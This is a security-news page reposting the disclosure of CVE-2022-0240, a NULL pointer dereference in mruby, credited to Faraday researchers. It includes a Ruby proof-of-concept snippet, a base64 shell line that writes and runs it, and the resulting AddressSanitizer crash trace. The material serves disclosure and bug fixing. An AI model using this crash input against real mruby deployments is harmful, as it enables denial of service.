Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2022-0240: NULL Pointer Dereference in mruby

mruby is vulnerable to NULL Pointer Dereference

CVE
Open in Source
#ubuntu

Description

There is a NULL Pointer Dereference in prepare_singleton_class (src/class.c:360:13). This bug has been found on mruby lastest commit (hash 171d32c0071d776207174a40a8fa26def3dbb931) on Ubuntu 20.04 for x86_64/amd64.

Proof of Concept

1.times{b={}
a=0
[**0,m:0]
c={0=>0,nil=>nil}[0]
def m()end
def c.e()end}

Steps to reproduce

1- Clone repo and build with ASAN using MRUBY_CONFIG=build_config/clang-asan.rb rake

2- Use mruby to execute the poc:

$ echo -ne "MS50aW1lc3tiPXt9CmE9MApbKiowLG06MF0KYz17MD0+MCxuaWw9Pm5pbH1bMF0KZGVmIG0oKWVuZApkZWYgYy5lKCllbmR9Cg==" | base64 -d > poc
$ build/host/bin/mruby ./poc
/home/octa/mruby/src/class.c:360:13: runtime error: member access within null pointer of type 'struct RClass'
SUMMARY: UndefinedBehaviorSanitizer: undefined-behavior /home/octa/mruby/src/class.c:360:13 in 
AddressSanitizer:DEADLYSIGNAL
=================================================================
==31695==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000010 (pc 0x0000005270f8 bp 0x7ffec6a14090 sp 0x7ffec6a13d80 T0)
==31695==The signal is caused by a READ memory access.
==31695==Hint: address points to the zero page.
    #0 0x5270f8 in prepare_singleton_class /home/octa/mruby/src/class.c:360:13
    #1 0x52688f in mrb_singleton_class_ptr /home/octa/mruby/src/class.c:1685:3
    #2 0x528785 in mrb_singleton_class /home/octa/mruby/src/class.c:1692:22
    #3 0x600757 in mrb_vm_exec /home/octa/mruby/src/vm.c:2918:17
    #4 0x566ee9 in mrb_vm_run /home/octa/mruby/src/vm.c:1128:12
    #5 0x55c339 in mrb_top_run /home/octa/mruby/src/vm.c:3050:12
    #6 0x88b6ce in mrb_load_exec /home/octa/mruby/mrbgems/mruby-compiler/core/parse.y:6882:7
    #7 0x88d2dc in mrb_load_detect_file_cxt /home/octa/mruby/mrbgems/mruby-compiler/core/parse.y:6925:12
    #8 0x4c9118 in main /home/octa/mruby/mrbgems/mruby-bin-mruby/tools/mruby/mruby.c:347:11
    #9 0x7f46ef9450b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
    #10 0x41d82d in _start (/home/octa/mruby/build/host/bin/mruby+0x41d82d)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/octa/mruby/src/class.c:360:13 in prepare_singleton_class
==31695==ABORTING

Acknowledgements

This bug was found by Octavio Gianatiempo ([email protected]) and Octavio Galland ([email protected]) from Faraday Research Team.

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE
CVE-2023-6905
CVE
CVE-2023-6903
CVE
CVE-2023-6904
CVE
CVE-2023-3907
CVE